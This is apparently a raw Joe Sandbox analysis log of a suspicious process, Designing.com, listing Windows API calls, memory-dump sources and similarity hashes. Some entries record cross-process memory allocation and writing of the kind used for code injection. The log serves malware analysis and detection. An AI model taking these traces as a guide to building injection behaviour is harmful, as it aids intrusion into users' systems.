                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E01982
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01991
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01998
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E019AE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                              • Opcode ID: 0ef5bcbaff5a4dedc15b7d50dd9943d929cdee40d40a60aa4d5f3d8f7d940608
                                                                                                                                                                              • Instruction ID: a6433ea4edc6c86538e1d44007bb4d298cf3be31d64d1f53ba161ee908508b2f
                                                                                                                                                                              • Opcode Fuzzy Hash: 0ef5bcbaff5a4dedc15b7d50dd9943d929cdee40d40a60aa4d5f3d8f7d940608
                                                                                                                                                                              • Instruction Fuzzy Hash: D7F06275104305AFD7214F65EC9DF563F6DEFC97A0F110414F945EB290CA71DC548A60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E01916
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E01922
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E01931
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E01938
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E0194E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                              • Opcode ID: bb0f7f2ac101494285db5eb204f13f46954ad8956378bb5173dede2a92748f6a
                                                                                                                                                                              • Instruction ID: fc66e9093d45bcb8250a25d84d48101abb4e237f73ab5a0a64cced988df8d2e3
                                                                                                                                                                              • Opcode Fuzzy Hash: bb0f7f2ac101494285db5eb204f13f46954ad8956378bb5173dede2a92748f6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 71F0497520430AAFDB210FA6AC4DF563FAEEF897A0F510414FA45EB2A0CA71DC549B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CCB
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CD8
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CE5
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CF2
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CFF
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10D0C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                              • Opcode ID: 94c86d835782e36b95e707ef2c46f72ac5fa864fd3a30d8e869d194bbd6761d1
                                                                                                                                                                              • Instruction ID: eed68367ca010e82d75328d4fb69bb3ead5b08d074cdf60e42ae86f4ea03e25f
                                                                                                                                                                              • Opcode Fuzzy Hash: 94c86d835782e36b95e707ef2c46f72ac5fa864fd3a30d8e869d194bbd6761d1
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E01AE71800B15DFCB30AFAAD980856FBF9BF503193159A3ED19662931C7B0A998DF80
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00E065BF
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E065D6
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00E065EE
                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 00E0660A
                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00E06624
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                                                              • Opcode ID: 1808f17d33658a1459e8dc9cc45c571aa2ba848fbbf2570dafaf0376ca450381
                                                                                                                                                                              • Instruction ID: 96c5d23cfadd1004d48e7e39d40ce5f032ca2a6cca2a964376113d86ebc7a781
                                                                                                                                                                              • Opcode Fuzzy Hash: 1808f17d33658a1459e8dc9cc45c571aa2ba848fbbf2570dafaf0376ca450381
                                                                                                                                                                              • Instruction Fuzzy Hash: F0018630504708AFEB205F21ED4EB967B78FB10705F001559A597710E1DBF5AAA88A50
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDAD2
                                                                                                                                                                                • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
                                                                                                                                                                                • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDAE4
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDAF6
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDB08
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDB1A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                              • Opcode ID: 26828ef3592a3359b70d6bacb317c78ddd505b51f05f29dc700d3c95a4188bc8
                                                                                                                                                                              • Instruction ID: fa3e34a1f49535394517107f2b17d5b1f1f99ad2374261572d79455c6c58f699
                                                                                                                                                                              • Opcode Fuzzy Hash: 26828ef3592a3359b70d6bacb317c78ddd505b51f05f29dc700d3c95a4188bc8
                                                                                                                                                                              • Instruction Fuzzy Hash: E1F0F472A482046F8A24EB95FD85D6777EFEF547507A91C07F049E7601C660FC4087B4
APIs
• _free.LIBCMT ref: 00DD262E
  • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
  • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
• _free.LIBCMT ref: 00DD2640
• _free.LIBCMT ref: 00DD2653
• _free.LIBCMT ref: 00DD2664
• _free.LIBCMT ref: 00DD2675
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 7a668fb63c7a05fd89477c0ee8e87f3b5f79ba7ecd910f23f4d26428f6539701
• Instruction ID: ec8c0c790d3b6fae84315d08dd8f67bf29fe2a21898864ad0dcbfb9c5971b358
• Opcode Fuzzy Hash: 7a668fb63c7a05fd89477c0ee8e87f3b5f79ba7ecd910f23f4d26428f6539701
• Instruction Fuzzy Hash: 82F03070A052118F8605FFAAFC058993765FF34790354054BF418B3375CB304A89AFE4
APIs
Strings
Similarity
• API ID: __freea$_free
• String ID: a/p$am/pm
• API String ID: 3432400110-3206640213
• Opcode ID: ccb27d9d1594b91840eee7c2c265982cab3cf66738bfd50114ff47ed135659e1
• Instruction ID: a7147ba788455ab7be393c24d77b0f1def413c3fc06af8ff0c0021e542be7c79
• Opcode Fuzzy Hash: ccb27d9d1594b91840eee7c2c265982cab3cf66738bfd50114ff47ed135659e1
• Instruction Fuzzy Hash: AFD1CF79940206FACB249FA8C855BBABBB1FF45300F2C415BE9429B351D675DD80CBB1
APIs
  • Part of subcall function 00E141FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14229
  • Part of subcall function 00E141FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14239
• GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00E25419
• VariantInit.OLEAUT32(?), ref: 00E2550E
• VariantClear.OLEAUT32(?), ref: 00E255CD
Strings
Similarity
• API ID: ErrorLastVariant$ClearFormatInitMessage
• String ID: bn
• API String ID: 2854431205-2317007323
• Opcode ID: 1cfa777697f2bf03191af55a11c5f5134b28744d0bbcff010d478b2e7cee3404
• Instruction ID: a53f1c1cc575ff669e941ab3592a23d3d3b182255d824d4b0c84a371ef149c58
• Opcode Fuzzy Hash: 1cfa777697f2bf03191af55a11c5f5134b28744d0bbcff010d478b2e7cee3404
• Instruction Fuzzy Hash: 8ED15B71900249DFCB04DF95D891AEDBBB4FF08314F54441DE416BB292DB31AA86CF60
APIs
• __Init_thread_footer.LIBCMT ref: 00DAD253
Strings
Similarity
• API ID: Init_thread_footer
• String ID: t5$t5$t5
• API String ID: 1385522511-3228143211
• Opcode ID: 279c2866a335105921e579a4dc8476639d93981834f4f03385b81ea86d135b67
• Instruction ID: 13c0665072849a39a5ecf32c8c7bc01972afb075fcb09b7a810eefb9b692006a
• Opcode Fuzzy Hash: 279c2866a335105921e579a4dc8476639d93981834f4f03385b81ea86d135b67
• Instruction Fuzzy Hash: D1914D75A00206DFCB14CF69C4906A9B7F2FF5A314F24815AD986A7740D731EE82DFA0
APIs
Strings
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY$bn
• API String ID: 157775604-1875210186
• Opcode ID: 6c2b4cb0719886a763bdb589ecbaf3124083ac130d547bc6e44de9221ff34f4c
• Instruction ID: 2fb9dad24f904874fb5fa84bf7f8fbef595148dfba5d11bd8ec604f05d494112
• Opcode Fuzzy Hash: 6c2b4cb0719886a763bdb589ecbaf3124083ac130d547bc6e44de9221ff34f4c
• Instruction Fuzzy Hash: 0641AD72A00219DFCB00DFA9D8859EEBBF5FF59324B105229E406B7261E7709D81CBA0
APIs
  • Part of subcall function 00E0BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E02B1D,?,?,00000034,00000800,?,00000034), ref: 00E0BDF4
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E030AD
  • Part of subcall function 00E0BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E02B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E0BDBF
  • Part of subcall function 00E0BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E0BD1C
  • Part of subcall function 00E0BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E02AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E0BD2C
  • Part of subcall function 00E0BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E02AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E0BD42
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E0311A
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E03167
Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 4150878124-2766056989
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\124531\Designing.com,00000104), ref: 00DD1AD9
• _free.LIBCMT ref: 00DD1BA4
• _free.LIBCMT ref: 00DD1BAE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\124531\Designing.com
• API String ID: 2506810119-898694156
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E0CBB1
• DeleteMenu.USER32(?,00000007,00000000), ref: 00E0CBF7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E729C0,01706A50), ref: 00E0CC40
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E3DCD0,00000000,?,?,?,?), ref: 00E34F48
• GetWindowLongW.USER32 ref: 00E34F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E34F75
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
APIs
  • Part of subcall function 00E23DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00E23AD4,?,?), ref: 00E23DD5
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E23AD7
• _wcslen.LIBCMT ref: 00E23AF8
• htons.WSOCK32(00000000,?,?,00000000), ref: 00E23B63
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E349DC
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E349F0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00E34A14
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E351A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E351B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E351B8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E342DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E342EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E34312
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 47a69ea0367d13f82f6f42c1bbc7eaaf53b3d6a8730bfa00d847348b99714357
• Instruction ID: 1826e1181b65fcb84870935dab79c2494b2f58694d56f950e3b6ba6f638c588f
• Instruction Fuzzy Hash: 3021AF72604218ABEB118EA4DC88FAB3B6EEB89758F119114F901BB1E0C671AC51C7A0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00E1544D
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E154A1
• SetErrorMode.KERNEL32(00000000,?,?,00E3DCD0), ref: 00E15515
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: f07d1e0d2db8b0713f7d167d51c1798e4d9bf48f7eb712516542925037816a56
• Instruction ID: 5a17a1a89beb37d55be1e322f8f33aa2c3c9e998828b5fd9d63074b3e06d95e8
• Instruction Fuzzy Hash: 49314F71A00209EFDB10DF64C885EAA7BB9EF05308F1440A5E809EB262D771EE85DB71
APIs
• GetActiveWindow.USER32 ref: 00E38339
• EnumChildWindows.USER32(?,00E3802F,00000000), ref: 00E383B0
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
Similarity
• API ID: Window$ActiveChildEnumLongWindows
• String ID: ($(
• API String ID: 3814560230-3881858432
• Opcode ID: 0e0707479d612cc963df36583e139810ddf18cb88f2c49b5920a22a686152bb7
• Instruction ID: b054337514fd7dce01a94c0583d3b8f28d4ca6e5f16d905eb06e21043e678c90
• Instruction Fuzzy Hash: 07215C34200305DFC724DF29D854AA6BBF5FB8A720F24161DFA79A73A0DB70A855CB60
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E34CED
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E34D02
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E34D0F
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 2dae555ce39d1bf3f310e41610440e5041425fb3665e51ee6f490fb53dcb9273
• Instruction ID: 673a4eb992d33602324e7f023ed699e17fa43be9b92bb46b145af0f8ee3c1230
• Instruction Fuzzy Hash: FE11E3B1240248BEEF215E65DC0AFAB7BA8EF85B68F111514FA55F20E0C671E850DB20
APIs
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
  • Part of subcall function 00E036F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E03712
  • Part of subcall function 00E036F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E03723
  • Part of subcall function 00E036F4: GetCurrentThreadId.KERNEL32 ref: 00E0372A
  • Part of subcall function 00E036F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E03731
• GetFocus.USER32 ref: 00E038C4
  • Part of subcall function 00E0373B: GetParent.USER32(00000000), ref: 00E03746
• GetClassNameW.USER32(?,?,00000100), ref: 00E0390F
• EnumChildWindows.USER32(?,00E03987), ref: 00E03937
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: 850cf4a7d971f957b04a3d7aad42e7f0bdcbaa06ae555c945a966df9347384e1
• Instruction ID: a89b4786eeca0ee0f3d881e8ced2cda3b63d05ce62b3302826601c33cd43c6bf
• Instruction Fuzzy Hash: 3C11E7B5A00209ABCF01BF749C86AEE77AD9F94304F045065BD09BB2D6CF719945DB30
APIs
• DeleteObject.GDI32(?), ref: 00DA5A34
• DestroyWindow.USER32(?,00DA37B8,?,?,?,?,?,00DA3709,?,?), ref: 00DA5A91
Similarity
• API ID: DeleteDestroyObjectWindow
• String ID: <)$<)
• API String ID: 2587070983-10615988
• Opcode ID: 18c949e28d9037bef3683294ba517e38e79a277bfc5f1a080effd73d70ef8131
